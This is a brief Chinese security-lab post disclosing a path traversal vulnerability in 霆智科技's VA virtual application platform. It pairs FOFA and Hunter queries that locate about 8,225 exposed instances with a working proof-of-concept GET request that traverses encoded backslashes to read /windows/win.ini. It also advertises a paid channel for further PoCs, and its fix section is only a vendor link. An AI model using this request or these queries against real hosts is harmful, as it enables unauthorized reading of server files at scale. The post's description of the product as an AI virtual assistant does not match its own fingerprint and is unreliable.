0x01 阅读须知
天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
(一) VA虚拟应用平台
霆智科技的VA虚拟应用平台是一个创新的技术平台,旨在为用户提供虚拟助手(Virtual Assistant)的功能和服务。虚拟助手是一种人工智能系统,通过自然语言处理、机器学习和其他相关技术,能够与用户进行对话,并执行各种任务和服务。
FOFA语法:
body="EAA益和应用接入系统"
hunter语法:
web.body="EAA益和应用接入系统"
hunter共8,225条资产
(二) 漏洞poc
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host:
更多漏洞POC发布在知识星球
星球的最近主题和星球内部工具一些展示
Web安全漏洞最新1day分享漏洞挖掘技巧分享
0x03 修复方案
官方修复缓解措施
补丁链接
http://www.tzfse.com.cn/